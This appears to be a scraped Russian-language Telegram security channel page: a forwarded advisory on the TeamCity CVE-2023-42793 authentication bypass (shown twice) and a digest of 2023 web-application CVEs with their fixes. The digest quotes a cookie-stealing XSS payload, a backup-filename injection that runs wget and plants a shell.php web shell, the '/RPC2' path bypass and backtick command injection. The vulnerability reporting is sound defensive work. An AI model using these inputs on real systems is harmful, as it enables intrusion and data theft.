Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤1❤🔥1
Forwarded from Positive Technologies
⚠️ Внимание! Трендовая уязвимость CVE-2023-42793 в JetBrains TeamCity.
TeamCity — решение для непрерывной интеграции и доставки ПО (CI/CD). Уязвимость вызвана недостаточным контролем доступа к API сервера и позволяет неаутентифицированному злоумышленнику получить доступ к панели администратора.
Под угрозой находятся компании-разработчики ПО.
Эксплуатация данной уязвимости позволяет злоумышленнику, имеющему сетевой доступ к серверу TeamCity, получить исходные коды проектов и развить дальнейшую атаку на инфраструктуру при помощи выполнения произвольного кода на агентах исполнения задач сборки проектов. Уязвимость может привести к недопустимым для вендоров событиям.
❗️По рекомендациям вендора, для устранения уязвимости необходимо обновить сервер TeamCity до версии 2023.05.4. Для снижения рисков, связанных с уязвимостью, необходимо установить плагин с исправлением от вендора.
🆘 Что делать
Проверьте узлы на наличие уязвимости CVE-2023-42793 с помощью MaxPatrol VM. Если установлены последние обновления базы знаний, уязвимые активы будут определены автоматически.
@Positive_Technologies
TeamCity — решение для непрерывной интеграции и доставки ПО (CI/CD). Уязвимость вызвана недостаточным контролем доступа к API сервера и позволяет неаутентифицированному злоумышленнику получить доступ к панели администратора.
Под угрозой находятся компании-разработчики ПО.
Эксплуатация данной уязвимости позволяет злоумышленнику, имеющему сетевой доступ к серверу TeamCity, получить исходные коды проектов и развить дальнейшую атаку на инфраструктуру при помощи выполнения произвольного кода на агентах исполнения задач сборки проектов. Уязвимость может привести к недопустимым для вендоров событиям.
❗️По рекомендациям вендора, для устранения уязвимости необходимо обновить сервер TeamCity до версии 2023.05.4. Для снижения рисков, связанных с уязвимостью, необходимо установить плагин с исправлением от вендора.
🆘 Что делать
Проверьте узлы на наличие уязвимости CVE-2023-42793 с помощью MaxPatrol VM. Если установлены последние обновления базы знаний, уязвимые активы будут определены автоматически.
@Positive_Technologies
👍4🔥4🤔1
🐛 CVE-2023-5009 в системе контроля версии GitLab продуктов CE и EE версий от 13.12 до 16.2.7, от 16.3 до 16.3.4, позволяет запустить пайплайн через запланированные политики сканирования безопасности, что может привести к утечкам данных и к атакам на цепочки поставок. В рамках исправления уязвимости commit были внесены корректировки переменных, отвечающих за планирование политик (замена
schedule.owner `на `security_policy_bot или security_policy_bot_2)🐛 CVE-2023-5060 в системе мониторинга сети LibRemMS, которая приводит к XSS. Для выполнения атаки достаточно ввести в поле IP4 поисковой формы
"><noscript>alert(document.cookie)</noscript>. В процессе исправления уязвимости была добавлена функция экранирования HTML-спецсимволов htmlspecialchars($_POST['address']).🐛 CVE-2023-5084 в приложении hestiacp до версии 1.8.8 (панель управления web-приложением) приводит к множественным XSS. Атака возможна с подменой параметров
v_timezone и v_backend_template в теле запроса. Исправление уязвимости commit исключает использования параметра v_backend_template для формирования ответа и реализует проверку на «белый» список параметра v_timezone.🐛 CVE-2023-38886 в системе Dolibarr ERP CRM до версии 17.0.1, позволяет привилегированному удаленному пользователю выполнить произвольный код. Для реализации атаки используется функционал backup и поле для ввода имени файла с полезной нагрузкой
wget 192.168.1.167 && mv index.html shell.php. В приложении некорректно реализована функция санитизации введенного значения имени файла. Полный разбор уязвимости опубликован здесь.🐛 CVE-2023-43770 в почтовом веб-клиенте Roundcube до 1.4.14, 1.5.x до 1.5.4, и 1.6.x до 1.6.3 позволяет выполнить XSS через полученное e-mail сообщение. Причина уязвимости заключается в отсутствии проверки пользовательских данных на символы
<, >, в результате появляется возможность инъекции тегов html-кода. При исправлении проблемы commit были добавлены символы <, > в шаблоны, используемые в контроле пользовательских данных.🐛 CVE-2023-42793 в JetBrains TeamCity до версии 2023.05.4 позволяет обойти процесс аутентификации и в последствии выполнить произвольный код на атакуемом сервере. Проблема заключается в неправильном паттерне пути запроса (
/**/RPC2), для которого были отключены предобработчики, в том числе и предобработчик аутентификации. Злоумышленник может обратиться к произвольному пути, в конец которого добавить /RPC2, что позволит обойти механизмы защиты. Исправление уязвимости заключается в указании правильного паттерна пути для RPC2 - /RPC2.🐛 CVE-2023-5002 в платформе pgAdmin для администрирования PostgreSQL до версии 7.6 позволяет выполнить произвольные системные команды. Уязвимость заключается в отсутствии проверки значения параметра
utility_path в эндпойнте /misc/validate_binary_path, которое попадает в качестве первого аргумента в функцию subprocess.getoutput. Первое исправление не устранило уязвимость, была добавлена недостаточная санитизация пользовательских данных - замена одного символа двойной кавычки на два, что по прежнему позволяло выполнять произвольные команды, например, оборачивая их в обратные кавычки (`` ls ``). В финальном исправлении функция subprocess.getoutput была реализована замена на более безопасный вариант - subprocess.run с shell=False.⁉️Хотите, чтобы эта #экспериментальная_рубрика стала постоянной? Ждём ваших реакций и комментариев👇
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥43👍13❤4
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥13😁11🔥4❤2👍1